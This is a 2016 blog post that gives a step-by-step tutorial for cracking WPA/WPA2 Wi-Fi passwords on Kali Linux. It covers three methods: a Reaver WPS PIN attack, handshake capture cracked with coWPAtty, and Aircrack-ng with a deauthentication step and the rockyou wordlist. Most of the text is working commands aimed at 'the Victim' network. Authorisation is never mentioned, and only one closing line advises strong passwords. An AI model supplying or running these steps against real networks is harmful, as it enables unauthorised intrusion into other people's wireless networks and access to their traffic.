Sunday, November 13, 2016

// //

Step by step Guide to hacking wifi password using kali Linux

     Wifi Securities are week as you all know and they can be easily compromised. AS for this to matter we are going to begin hacking wifi password tutorial below. Learn how to hack wifi password using ultimate three methods
      Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in response to serious weaknesses researchers had found in the previous system, WEP (Wired Equivalent Privacy)

A flaw in a feature added to Wi-Fi, called Wi-Fi Protected Setup (WPS), allows WPA and WPA2
security to be bypassed and effectively broken in many situations. Many access point they have a
Wifi Protected Setup enabled by default (even after we hard reset the access point).

Hacking WPA2-psk wifi password using reaver method

Step 1: Open Terminal and Find out the name of your wireless adapter. 
type ifconfig on a terminal. See the result. (here my wireless adapter is ‘wlan0’)
Hacking Wifi password | Image Provided by

Step 2: Type the following commands on terminal.
  • airmon-ng check kill
  • airmon-ng check
Hacking Wifi password | Image Provided by

Step 3: Enable Monitor mode. Now, we use a tool called airmon-ng to create a virtual interface called mon. Just type
  • airmon-ng start wlan0 
Hacking Wifi password | Image Provided by

Step 4: Start capturing packets. we’ll use airodump-ng to capture the packets in the air. You’ll see the name of the wifi you want to hack.
  • airodump-ng wlan0mon
Hacking Wifi password | Image Provided by

then press Ctrl+c
Step5: Copy the BSSID of Victim. And write it on this command.
  • reaver -i wlan0mon -b (BSSID) -vv -K 1
Hacking Wifi password | Image Provided by
For ex: reaver -i wlan0mon -b B0:5G:54:96:G7:70 -vv -K 1
Hacking Wifi password | Image Provided by
With This method you will are going to successfully hack wifi password now we move on to our 2nd method here

Hack wifi wpa2 password using coWPAtty

Step 1. airmon-ng start wlan0
Step 2. Start a Capture File
Next, we need to start a capture file where the hashed password will be stored when we capture the 4-way handshake.
  • airodump-ng --bssid wi:fi:ma:ca:dd:re -c 9 -w cowpatty wlan0mon
This will start a dump on the selected AP (wi:fi:ma:ca:dd:re), on the selected channel (-c 9) and save the the hash in a file named cowcrack.
Step 3. Capture the Handshake
Now when someone connects to the AP, we'll capture the hash and airdump-ng will show us it has been captured in the upper right-hand corner.
Hacking Wifi password | Image Provided by

Step 4. Run the Cowpatty

Now that we have the hash of the password, we can use it with cowpatty and our wordlist to crack the hash.
  • cowpatty -f /pentest/passwords/wordlists/darkc0de.lst -r /root/cowcrack-01.cap -s Mandela2
    Hacking Wifi password | Image Provided by
As you can see in the screenshot above, cowpatty is generating a hash of every word on our wordlist with the SSID as a seed and comparing it to the captured hash. When the hashes match, it dsplays the password of the AP.
Here The 2nd method ended now let's move on to the third method down below.

Hacking Wifi Wpa2 password using Aircrack-ng

Enter “iwconfig” and verify you have wlan0 and wlan0mon interfaces as in the screenshot :
Hacking Wifi password | Image Provided by
Enter “airmon-ng” and verify your results are similar to screenshot below :
Now we start the wireless monitoring function with “Airmon-ng start wlan0” :
Hacking Wifi password | Image Provided by
Note it says monitor mode enabled above, so we know the monitoring interface is ready to go.
Next we use “airodump-ng wlan0mon” to locate the network we want to crack :

Hacking Wifi password | Image Provided by
Let it run a couple of minutes, then control C to stop.  The network we want to crack is above, the SSID is NETGEAR94 (NOT NETGEAR84).  We now have the SSID, BSSID and Channel that we need.
Next we use “Airodump-ng –w somefile –c 11 –bssid 80:37:73:A7:AA:08 wlan0mon” to collect data needed for the crack.
“ –w somefile” is the file that the data will be dumped to, you can use any filename you like.
“–c 11” means Channel 11, the channel which the SSID using :
Add caption
 Above it is running, we leave it running a few minutes while as it collects data.
To work properly, Airodump-ng above must capture password data.  On a busy Wi-Fi network this is no problem, as password data is sent through the air on a regular basis.  If the Wi-Fi network is not busy, we can (optionally) force password data to be sent using a de-auth.  This is done in a new terminal window, while Airodump-ng is still running, as in the screenshot below :
Hacking Wifi password | Image Provided by
Let it run a couple of minutes, then Control C to stop.
Close above Window, then go back to original window. Now stop the Airodump-ng  with Control C. Next type “ls”, to verify we have the file we need :
Hacking Wifi password | Image Provided by
Next we use “Aircrack-ng somefile-01.cap –w usr/share/wordlists/rockyou.txt”.
Where “somefile-01.cap” is the capture file.
Where “–w usr/share/wordlists/rockyou.txt” is the path to the dictionary password file rockyou.txt.
rockyou.txt is included with the Kali Linux distro, but it comes zipped so you will need to unzip it, with gunzip.  Other dictionary password files are available online, and may be used in place of rockyou.txt.  In the screenshot,  it is comparing the dump in somefile to the dictionary in rockyou.txt, which can take a while :

Hacking Wifi password | Image Provided by
After a while, the key is found. We can log into the network using the password mongoose.  Success, we have completed the hack!!! :
Hacking Wifi password | Image Provided by
If you take nothing else away from this article, remember this.  Choose a strong password to secure your Wi-Fi network with WPA2, or else you risk the password being hacked.  And strong passwords should not contain dictionary words.